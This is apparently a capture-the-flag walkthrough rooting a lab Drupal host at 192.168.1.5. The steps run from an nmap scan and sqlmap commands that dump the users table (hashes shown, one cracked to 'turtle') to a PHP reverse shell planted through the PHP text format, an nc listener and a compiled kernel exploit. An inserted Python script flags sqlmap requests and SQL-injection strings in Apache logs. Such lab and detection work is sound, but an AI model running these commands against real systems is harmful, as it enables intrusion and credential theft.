We start by scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv
Scanning directories with dirb turned up the following:
The robots.txt file had a lot to tell us:
From the robots.txt file we can see there are some SQL databases behind the site. We need to find the injectable entry point to exploit with sqlmap, so let's visit the links on the site:
sqlmap -u 192.168.1.5/?nid=1 --dbs --batch --risk 3 --level 5
sqlmap -u 192.168.1.5/?nid=1 -D d7db --tables --batch --risk 3 --level 5
sqlmap -u 192.168.1.5/?nid=1 -D d7db -T users --columns --dump
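On the defensive side, a sqlmap run like the one above is very noisy in the web server's access log. The script below is an added example (not part of this write-up) that flags requests carrying the default sqlmap User-Agent or an injection-looking value in a query parameter such as nid; the log lines it parses are constructed for the example and the client IPs in them are made up.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Constructed Apache "combined" log lines (not from the write-up); client IPs are made up.
SAMPLE_LOG = """\
192.168.1.20 - - [10/Mar/2024:12:00:01 +0000] "GET /?nid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.30 - - [10/Mar/2024:12:00:05 +0000] "GET /?nid=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.5"
192.168.1.30 - - [10/Mar/2024:12:00:06 +0000] "GET /?nid=1%27%20UNION%20SELECT%20NULL-- HTTP/1.1" 500 312 "-" "sqlmap/1.5"
192.168.1.30 - - [10/Mar/2024:12:00:07 +0000] "GET /?nid=(SELECT%20SLEEP(5)) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.40 - - [10/Mar/2024:12:00:09 +0000] "GET /user/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Decoded parameter values that look like SQL: a keyword, a boolean tail (AND 1), a quote or a comment.
SQLI_RE = re.compile(r"(?i)\b(?:union|select|sleep)\b|\b(?:and|or)\b\s+\d|'|--")

def suspicious_params(path):
    """Return {param: decoded value} for query parameters whose value matches SQLI_RE."""
    hits = {}
    for key, values in parse_qs(urlparse(path).query).items():  # parse_qs URL-decodes for us
        for value in values:
            if SQLI_RE.search(value):
                hits[key] = value
    return hits

def analyze(log_text):
    """Flag each request carrying a sqlmap User-Agent or an injection-like parameter value."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:  # not combined format (or a truncated line): skip rather than crash
            continue
        reasons = []
        if "sqlmap" in m["ua"].lower():  # default UA; trivially changed, so never rely on it alone
            reasons.append("sqlmap user-agent")
        params = suspicious_params(m["path"])
        if params:
            reasons.append("injection-like params: " + ", ".join(f"{k}={v!r}" for k, v in params.items()))
        if reasons:
            findings.append({"ip": m["ip"], "path": m["path"], "status": m["status"], "reasons": reasons})
    return findings

def noisy_sources(findings, threshold=2):
    """Source IPs with at least `threshold` flagged requests; a --risk 3 --level 5 run sends hundreds."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Run analyze(SAMPLE_LOG) and noisy_sources() over the sample: only the three requests from 192.168.1.30 are flagged, including the one that spoofed a browser User-Agent but still carried a SLEEP() payload.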
Now we have 2 users with hashed passwords:
admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
Using John the Ripper to crack the hashes, john's hash came back with the password turtle, while the admin hash looks like it is going to take time, as maybe it's not meant to be cracked, so let's use john's password to log in.
We are going to use this link to log in: http://192.168.1.5/user/
Now navigate to this webpage http://192.168.1.5/user#overlay=node/3/webform/configure and change Text Format to PHP (that format is only offered because the site has Drupal's PHP filter module enabled, which is the misconfiguration this step relies on).
Now let's put PHP reverse-shell code into this page:
After that we go to the contact page, fill it in with anything and click submit, while on our end an nc listener on port 444 (the port I use) is ready for the connection to be made.
Now I ran a tool called linux-exploit-suggester.sh, searched for the suggested exploit on my machine using searchsploit and located it, compiled it with gcc, then transferred it to the host using wget and SimpleHTTPServer.
gcc -o hack2 45010.c
Change directory to /root, cat flag.txt, and we are done!!!